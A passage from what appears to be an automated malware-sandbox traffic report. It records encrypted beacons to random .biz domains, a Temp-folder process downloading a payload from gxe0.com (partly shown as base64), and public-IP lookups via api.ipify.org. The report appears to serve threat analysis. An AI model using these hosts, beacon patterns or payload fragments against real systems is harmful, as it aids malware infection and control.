                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:52.156639099 CET832OUTData Raw: 4d 59 a3 29 59 b4 51 1a 34 03 00 00 58 ff d6 02 7f 81 30 77 fc 75 14 36 b5 bc 01 f1 af 03 21 ea b9 db 7b 81 60 12 47 64 44 75 87 8f a8 ff 65 8f 13 d4 98 16 16 c5 78 f3 12 40 44 8e 88 87 99 0f e2 37 92 b6 5a 0d f7 a5 f9 05 23 cc 00 c9 e9 29 44 74
                                                                                                                                                                                                                                                                                                                                Data Ascii: MY)YQ4X0wu6!{`GdDuex@D7Z#)Dt8H6m=_Yy+e px]ml^3T7[<;pw2BFv@]fXpeXRsBl4%eRi*s!J G9jC)ua(G#DT#$
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.586220980 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:53 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=ffffb99201b34fbf0d3c9457c6c2d0f5|8.46.123.75|1732094813|1732094813|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                53192.168.2.55003813.251.16.15080
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.701181889 CET352OUTPOST /xwpgxeg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.701215982 CET832OUTData Raw: ee 07 bb d1 6b ba 68 bb 34 03 00 00 69 8f cd ac c4 44 ca c8 b4 f7 9c 96 ab 76 53 dd d2 6c 48 61 7b 06 ba ac 48 80 21 6a ae 63 21 e0 ac 3f 66 52 99 e6 b2 93 7d cb 7f e1 a9 c3 c7 4b 02 19 c1 48 6b 53 fc 71 5b 3a 49 87 a8 1f e7 43 a3 40 a0 03 21 60
                                                                                                                                                                                                                                                                                                                                Data Ascii: kh4iDvSlHa{H!jc!?fR}KHkSq[:IC@!`& ]<=A|a8GO5CF<QZ~/sj `!*Kz|k&D #_MXU9s'~V(1&FJdTxJPgZFC}yqig2:
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:55.123192072 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:54 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=057736d91e183e6e76cd94369e8294f4|8.46.123.75|1732094814|1732094814|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                54192.168.2.55004047.129.31.21280
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.057140112 CET346OUTPOST /hppl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.057321072 CET832OUTData Raw: 8c a2 cb 40 7f 9e a3 9d 34 03 00 00 e5 d7 5b 59 6c 0b 85 d4 2a 7d a0 70 82 cf f1 2d cc d2 f1 1d a9 c1 d4 49 16 04 60 68 e3 9b 35 61 61 4b 03 ec 17 db 3a 0f 7f 12 35 91 ae c3 1d dd ce b4 5d 83 34 7b 8e c4 42 47 cd 5b bc 9e 8d f9 51 88 c8 7a 56 87
                                                                                                                                                                                                                                                                                                                                Data Ascii: @4[Yl*}p-I`h5aaK:5]4{BG[QzVnO%r%qy^jS6.(/l`A1Ht(o8$jY[>w!:,}Db&"[4qdNc?^[+tj4J>]L
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.519124985 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:57 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=e7cd19b3113d3921d58bd46d532a9762|8.46.123.75|1732094817|1732094817|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                55192.168.2.55004113.251.16.15080
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.544234037 CET358OUTPOST /rrrklmujfcwnchb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.544248104 CET832OUTData Raw: ee 9a 9b 7d 53 ca 2c a6 34 03 00 00 93 a4 6d f2 ff 73 90 7d b0 cd c0 02 cc 59 01 5c 6e 13 65 b2 8f e0 3e 32 79 10 f6 67 17 a8 1f e5 0e ee 98 30 1d 1c 8c 56 71 86 25 ec 6c 8d 05 8b 63 d1 a8 45 4d d4 52 f9 6c a0 25 ad a8 a7 59 e5 28 c6 d7 92 14 5f
Data Ascii: }S,4ms}Y\ne>2yg0Vq%lcEMRl%Y(_;rIiVI-:6H7hz@o6hqIHb>b5b:#VY+tcNOsciXnvqW&TGa~5eV#*w92#i2D~T
Nov 20, 2024 10:26:58.959669113 CET | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:26:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b33057b44cd2d61c51ecc977a33f9445|8.46.123.75|1732094818|1732094818|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
56 | 192.168.2.5 | 50043 | 3.94.10.34 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:59.979625940 CET | 359 | OUT | POST /pggbsfikilutqo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:26:59.979665995 CET | 832 | OUT | Data Raw: 1e 12 3d 18 20 33 a7 ae 34 03 00 00 27 49 90 f5 c7 d1 dd 0f 4e 2f 9a 38 6c 0e bf 67 52 8b e9 9b 5e 46 dd 64 f4 04 fe ab 18 56 12 3a 88 ba c1 c3 02 80 cc 86 05 30 76 7a c5 fb 6c 0b de b4 97 56 dc 7c be 6d c1 6c cc 26 d9 bb da 47 7b 53 ff b1 1d 33
Data Ascii: = 34'IN/8lgR^FdV:0vzlV|ml&G{S3L2YXe!p|{=DLmp#X+I)2eBtx-W*nj4J<aXk|2HkB2z\DQd]a[
Nov 20, 2024 10:27:00.453226089 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:27:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=349a3068f024a3887213cb3da09c2e14|8.46.123.75|1732094820|1732094820|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 198.252.105.91 | 443 | 7096 | C:\Users\user\AppData\Local\Temp\x.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-20 09:24:34 UTC | 162 | OUT | GET /yak2/233_Juqmtmyadyy HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: gxe0.com
2024-11-20 09:24:34 UTC | 365 | IN | HTTP/1.1 200 OK
Connection: close
last-modified: Thu, 14 Nov 2024 22:46:27 GMT
accept-ranges: bytes
content-length: 3182288
date: Wed, 20 Nov 2024 09:24:34 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 66 47 78 6f 54 45 43 41 55 4a 42 55 57 49 52 67 68 4a 79 59 58 48 79 59 51 47 68 4d 55 44 67 34 57 4a 52 30 65 46 41 34 57 49 42 34 53 44 67 38 55 48 78 6b 4f 49 43 55 61 48 61 61 75 70 56 6b 6a 70 37 46 4c 56 53 49 65 47 69 45 61 4a 67 34 52 4a 69 61 6d 72 71 56 5a 49 36 65 78 53 31 35 36 65 58 4a 76 58 33 4e 6a 64 48 56 67 64 32 42 6d 5a 58 5a 65 5a 57 39 35 63 6e 4e 74 62 58 56 6b 58 46 31 7a 62 58 56 66 58 58 46 74 62 6e 4e 65 65 47 31 66 5a 48 6c 63 58 6e 70 35 63 6d 39 66 63 32 4e 30 64 57 42 33 59 47 5a 6c 64 6c 35 6c 62 33 6c 79 63 32 31 74 64 57 52 63 58 58 4e 74 64 56 39 64 63 57 31 75 63 31 35 34 62 56 39 6b 65 56 78 65 65 6e 6c 79 62 31 39 7a 59 33 52 31 59 48 64 67 5a 6d 56 32 58 6d 56 76 65 58 4a 7a 62 57 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: pq6lWSOnsUsfGxoTECAUJBUWIRghJyYXHyYQGhMUDg4WJR0eFA4WIB4SDg8UHxkOICUaHaaupVkjp7FLVSIeGiEaJg4RJiamrqVZI6exS156eXJvX3NjdHVgd2BmZXZeZW95cnNtbXVkXF1zbXVfXXFtbnNeeG1fZHlcXnp5cm9fc2N0dWB3YGZldl5lb3lyc21tdWRcXXNtdV9dcW1uc154bV9keVxeenlyb19zY3R1YHdgZmV2XmVveXJzbW1
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 41 42 65 38 51 43 4a 4b 32 34 6b 4c 41 59 78 71 65 6d 4b 4e 61 4e 72 7a 4a 4a 68 65 30 4e 41 64 6a 66 46 4f 44 2b 67 6c 78 48 76 7a 6e 75 42 4b 38 78 2b 78 43 47 76 47 41 42 77 48 69 54 37 63 38 2b 7a 46 57 37 72 2f 4a 4e 6d 4e 7a 4b 57 61 4b 4b 49 53 31 44 52 4e 4f 6d 49 69 47 50 74 6f 4b 79 56 55 49 70 32 45 57 69 69 68 61 6e 6e 68 61 76 6d 33 54 59 6a 53 48 58 70 72 59 32 4b 57 76 67 69 42 63 36 62 46 6e 6b 78 33 32 65 52 4f 38 4e 48 69 31 32 46 54 42 34 49 6e 4d 6b 4b 35 58 44 59 34 56 6a 35 66 49 62 63 68 63 48 5a 74 47 52 64 64 30 48 75 67 58 6f 67 50 32 66 4c 45 46 65 37 43 62 4c 30 73 45 52 73 43 41 62 53 42 73 2f 7a 47 33 48 46 4e 68 72 4f 61 59 4c 43 52 37 78 41 73 4e 4b 74 62 6f 48 42 43 30 57 44 32 57 31 64 33 52 74 59 44 71 42 54 78 56 42 67
                                                                                                                                                                                                                                                                                                                                Data Ascii: ABe8QCJK24kLAYxqemKNaNrzJJhe0NAdjfFOD+glxHvznuBK8x+xCGvGABwHiT7c8+zFW7r/JNmNzKWaKKIS1DRNOmIiGPtoKyVUIp2EWiihannhavm3TYjSHXprY2KWvgiBc6bFnkx32eRO8NHi12FTB4InMkK5XDY4Vj5fIbchcHZtGRdd0HugXogP2fLEFe7CbL0sERsCAbSBs/zG3HFNhrOaYLCR7xAsNKtboHBC0WD2W1d3RtYDqBTxVBg
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 71 50 57 2b 4c 2f 71 44 6b 46 4b 32 36 6e 36 70 78 5a 71 59 4f 36 64 34 6b 55 61 57 4a 6f 6f 49 79 52 64 6b 50 59 77 70 55 47 30 63 65 68 6f 52 6e 35 2b 6a 49 6e 58 6b 46 50 31 38 69 4f 53 69 49 4b 67 72 47 4b 4e 32 53 2f 6b 68 59 43 61 2f 51 47 51 78 4c 6c 4a 51 47 4a 4c 32 36 47 52 35 6c 45 30 56 73 36 49 4c 41 75 49 71 71 37 33 37 58 52 5a 68 43 7a 6d 5a 5a 47 78 68 64 33 4c 36 73 6d 39 7a 2b 55 6a 72 65 71 43 50 49 46 39 4f 6a 47 78 79 42 6d 30 48 51 65 6d 37 4d 6e 77 56 66 41 75 57 59 6c 6c 6d 45 33 4e 74 64 5a 77 69 59 59 54 41 31 4b 33 6c 72 54 6b 57 42 45 6b 37 63 6a 46 79 6d 56 39 7a 59 6e 53 55 45 42 61 51 44 4b 70 64 76 69 64 69 59 61 79 56 59 44 62 43 36 74 4d 77 6a 33 61 4c 74 52 6e 56 78 51 37 64 34 61 57 44 58 57 66 62 62 77 31 30 54 32 4a
                                                                                                                                                                                                                                                                                                                                Data Ascii: qPW+L/qDkFK26n6pxZqYO6d4kUaWJooIyRdkPYwpUG0cehoRn5+jInXkFP18iOSiIKgrGKN2S/khYCa/QGQxLlJQGJL26GR5lE0Vs6ILAuIqq737XRZhCzmZZGxhd3L6sm9z+UjreqCPIF9OjGxyBm0HQem7MnwVfAuWYllmE3NtdZwiYYTA1K3lrTkWBEk7cjFymV9zYnSUEBaQDKpdvidiYayVYDbC6tMwj3aLtRnVxQ7d4aWDXWfbbw10T2J
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 56 31 79 7a 71 30 36 6f 78 35 37 2b 62 72 6e 78 74 61 43 66 6e 69 75 55 33 39 35 4b 58 57 32 69 71 43 4c 71 7a 30 69 6d 44 75 4c 32 4c 66 6d 55 68 39 68 5a 31 37 54 42 46 77 6c 44 55 64 72 36 77 55 56 61 36 73 6b 71 53 6a 77 6d 4c 34 37 4f 53 59 75 6a 6f 73 33 74 45 4f 66 59 55 39 7a 4f 64 66 35 41 54 5a 37 32 42 6c 55 41 64 79 78 4c 31 2f 38 2f 37 37 7a 76 70 39 30 36 72 43 53 76 6f 72 56 63 75 65 50 54 39 72 66 5a 43 42 77 6f 74 51 54 39 47 41 52 4b 6f 37 46 42 4e 32 65 46 77 2b 63 57 47 35 30 59 67 69 46 64 6b 66 2f 67 42 76 4f 66 55 6d 2f 35 79 47 65 73 34 34 52 66 4a 6d 57 73 59 57 74 77 61 56 54 5a 6a 53 43 46 57 59 77 72 77 39 43 54 50 47 31 75 58 58 47 79 78 4e 63 43 65 65 31 6c 74 5a 4e 4a 38 45 51 62 51 51 68 71 66 35 52 5a 72 6b 79 61 6d 75 4a
                                                                                                                                                                                                                                                                                                                                Data Ascii: V1yzq06ox57+brnxtaCfniuU395KXW2iqCLqz0imDuL2LfmUh9hZ17TBFwlDUdr6wUVa6skqSjwmL47OSYujos3tEOfYU9zOdf5ATZ72BlUAdyxL1/8/77zvp906rCSvorVcuePT9rfZCBwotQT9GARKo7FBN2eFw+cWG50YgiFdkf/gBvOfUm/5yGes44RfJmWsYWtwaVTZjSCFWYwrw9CTPG1uXXGyxNcCee1ltZNJ8EQbQQhqf5RZrkyamuJ
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 6c 39 2f 45 49 52 64 4c 30 42 36 64 36 4f 4e 6e 70 65 76 48 76 48 42 74 64 7a 79 78 58 57 36 71 59 2b 51 35 6f 65 2f 36 4d 56 35 31 42 48 56 78 58 49 53 47 6c 65 2f 73 32 6c 52 75 6b 42 37 67 41 75 48 53 72 74 52 73 41 73 36 4b 42 42 4c 47 33 57 49 66 55 65 6a 47 45 4a 62 68 58 50 41 6f 62 35 2f 6e 51 63 78 51 49 58 43 55 35 77 31 37 4c 53 5a 34 70 57 4d 6f 47 6d 51 39 47 33 59 68 70 59 30 7a 34 39 51 58 38 36 42 49 55 61 4d 63 67 61 67 74 56 41 41 41 32 58 66 67 4e 43 62 61 79 46 45 49 48 67 51 32 51 79 52 59 38 54 4c 6c 39 7a 35 6d 77 46 2b 6b 76 61 55 54 63 58 72 6e 45 75 47 38 66 6a 45 32 50 6a 50 61 34 69 65 75 79 52 4c 48 37 74 64 75 5a 36 4f 74 64 39 6d 35 41 50 76 50 37 4b 68 2f 66 6d 50 39 66 2b 77 35 53 70 78 69 77 53 6d 58 32 75 5a 4e 66 78 52
                                                                                                                                                                                                                                                                                                                                Data Ascii: l9/EIRdL0B6d6ONnpevHvHBtdzyxXW6qY+Q5oe/6MV51BHVxXISGle/s2lRukB7gAuHSrtRsAs6KBBLG3WIfUejGEJbhXPAob5/nQcxQIXCU5w17LSZ4pWMoGmQ9G3YhpY0z49QX86BIUaMcgagtVAAA2XfgNCbayFEIHgQ2QyRY8TLl9z5mwF+kvaUTcXrnEuG8fjE2PjPa4ieuyRLH7tduZ6Otd9m5APvP7Kh/fmP9f+w5SpxiwSmX2uZNfxR
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 4d 6c 76 2f 6a 6e 6d 6b 50 54 4b 36 66 42 4f 6f 4d 50 43 46 55 42 4e 39 6a 30 45 42 46 32 7a 67 6d 62 55 38 61 4f 55 61 41 6d 43 66 76 6d 6c 68 61 35 50 4c 65 36 50 65 37 4a 36 59 6d 6a 6a 30 6e 75 46 59 6c 32 78 73 65 4a 6a 51 41 56 74 6e 53 6b 65 42 55 72 47 4f 42 48 31 79 2f 43 32 4d 68 4e 49 4b 4c 73 43 6d 38 63 78 71 62 34 32 70 4b 33 4b 36 36 51 55 4b 64 62 2b 6d 35 47 41 35 47 6c 67 47 35 58 72 46 2b 70 68 68 75 66 73 63 52 76 62 46 31 58 50 70 61 33 52 45 53 6e 39 34 4d 46 48 70 2f 62 44 77 75 42 39 4a 62 32 32 63 50 61 4a 69 31 57 71 6e 45 55 6f 79 2f 68 44 61 6e 4b 7a 37 75 47 51 57 4d 68 6a 42 47 6c 52 71 53 49 49 5a 30 54 73 33 4e 62 58 30 73 48 6b 66 59 52 73 47 32 75 75 62 73 48 66 77 68 42 49 58 45 36 4d 37 62 56 42 75 51 54 35 67 68 69 36
                                                                                                                                                                                                                                                                                                                                Data Ascii: Mlv/jnmkPTK6fBOoMPCFUBN9j0EBF2zgmbU8aOUaAmCfvmlha5PLe6Pe7J6Ymjj0nuFYl2xseJjQAVtnSkeBUrGOBH1y/C2MhNIKLsCm8cxqb42pK3K66QUKdb+m5GA5GlgG5XrF+phhufscRvbF1XPpa3RESn94MFHp/bDwuB9Jb22cPaJi1WqnEUoy/hDanKz7uGQWMhjBGlRqSIIZ0Ts3NbX0sHkfYRsG2uubsHfwhBIXE6M7bVBuQT5ghi6
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 6c 49 36 6e 50 4a 4a 67 6e 61 72 57 71 35 44 39 37 64 39 6c 30 37 46 6b 44 4c 53 5a 65 30 38 4b 71 6a 61 45 67 58 58 38 58 48 56 46 52 41 70 74 68 55 4f 56 73 68 71 58 37 46 43 2b 42 5a 4f 76 79 56 6f 72 46 54 62 30 2b 72 76 51 66 53 37 4c 59 45 59 4c 54 66 6c 48 78 49 30 73 6b 75 6c 6c 56 50 31 45 70 50 71 4a 72 32 77 69 6d 41 46 69 65 69 55 66 34 51 6c 2b 42 47 44 4a 36 48 76 37 65 30 46 79 36 6b 45 48 76 6d 7a 43 65 71 67 6b 75 68 4f 42 43 54 75 33 31 63 5a 45 52 4c 6f 52 71 47 4b 6c 6d 74 62 78 37 6d 4b 46 48 4c 4a 7a 65 6b 50 66 79 68 51 45 64 45 57 4f 4d 45 76 58 57 55 76 37 64 4c 51 50 4e 67 6c 4e 76 36 47 51 36 68 6c 50 77 78 6a 49 79 33 51 6a 6a 4d 53 68 31 4f 53 53 79 2f 6e 57 52 6d 34 35 61 65 77 72 63 6b 5a 41 61 6d 6c 64 44 67 4a 32 54 73 5a
                                                                                                                                                                                                                                                                                                                                Data Ascii: lI6nPJJgnarWq5D97d9l07FkDLSZe08KqjaEgXX8XHVFRApthUOVshqX7FC+BZOvyVorFTb0+rvQfS7LYEYLTflHxI0skullVP1EpPqJr2wimAFieiUf4Ql+BGDJ6Hv7e0Fy6kEHvmzCeqgkuhOBCTu31cZERLoRqGKlmtbx7mKFHLJzekPfyhQEdEWOMEvXWUv7dLQPNglNv6GQ6hlPwxjIy3QjjMSh1OSSy/nWRm45aewrckZAamldDgJ2TsZ
                                                                                                                                                                                                                                                                                                                                2024-11-20 09:24:34 UTC16384INData Raw: 44 76 6c 4e 6f 58 78 47 76 52 57 4c 6c 4e 74 6a 49 2f 69 7a 57 63 79 4a 54 6d 4b 53 63 77 32 64 71 72 63 56 6a 67 4c 61 68 44 61 37 65 48 50 6c 71 48 6d 62 64 6a 4c 6f 44 5a 72 46 68 2f 35 4d 38 2f 54 42 77 54 46 6c 6e 32 31 6d 5a 73 38 66 4b 47 6f 79 42 73 68 4e 77 46 34 52 41 61 2f 58 6a 6b 2f 4c 78 59 66 61 65 70 6d 4d 65 59 4e 6b 73 33 6b 75 72 39 46 56 61 51 35 46 59 46 5a 73 35 61 36 48 49 37 6e 64 56 75 63 52 44 58 52 76 4c 67 44 7a 4b 4b 30 43 47 38 35 4b 4d 41 58 4f 70 66 38 73 38 53 6a 35 47 62 52 34 65 57 70 39 62 6e 4f 37 73 6b 69 71 43 37 61 36 79 5a 34 77 63 32 34 61 64 79 74 79 78 35 62 52 48 58 6a 31 67 34 55 79 42 71 4e 4a 68 4f 38 4d 64 34 72 6c 6f 4d 62 43 4d 76 4c 58 67 55 2f 2f 75 64 79 32 57 56 4e 44 6f 48 4d 79 76 64 67 4c 67 4b 32
                                                                                                                                                                                                                                                                                                                                Data Ascii: DvlNoXxGvRWLlNtjI/izWcyJTmKScw2dqrcVjgLahDa7eHPlqHmbdjLoDZrFh/5M8/TBwTFln21mZs8fKGoyBshNwF4RAa/Xjk/LxYfaepmMeYNks3kur9FVaQ5FYFZs5a6HI7ndVucRDXRvLgDzKK0CG85KMAXOpf8s8Sj5GbR4eWp9bnO7skiqC7a6yZ4wc24adytyx5bRHXj1g4UyBqNJhO8Md4rloMbCMvLXgU//udy2WVNDoHMyvdgLgK2
2024-11-20 09:24:34 UTC | 16384 | IN | Data Raw: (16384-byte binary payload omitted)
2024-11-20 09:24:34 UTC | 16384 | IN | Data Raw: (16384-byte binary payload omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49726 | 172.67.74.152 | 443 | 3176 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 09:24:53 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-11-20 09:24:53 UTC | 399 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 09:24:53 GMT
    Content-Type: text/plain
    Content-Length: 11
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8e5763b91dea0c90-EWR
    server-timing: cfL4;desc="?proto=TCP&rtt=1596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1785932&cwnd=242&unsent_bytes=0&cid=12be056fea04a13d&ts=222&x=0"
2024-11-20 09:24:53 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
    Data Ascii: 8.46.123.75


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49824 | 172.67.74.152 | 443 | 5488 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 09:25:13 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-11-20 09:25:13 UTC | 399 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 09:25:13 GMT
    Content-Type: text/plain
    Content-Length: 11
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8e576439ddd042cf-EWR
    server-timing: cfL4;desc="?proto=TCP&rtt=1689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1694718&cwnd=252&unsent_bytes=0&cid=b841ff30dacbe731&ts=902&x=0"
2024-11-20 09:25:13 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
    Data Ascii: 8.46.123.75


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49900 | 172.67.74.152 | 443 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 09:25:26 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-11-20 09:25:26 UTC | 399 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 09:25:26 GMT
    Content-Type: text/plain
    Content-Length: 11
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8e57648709bf43dd-EWR
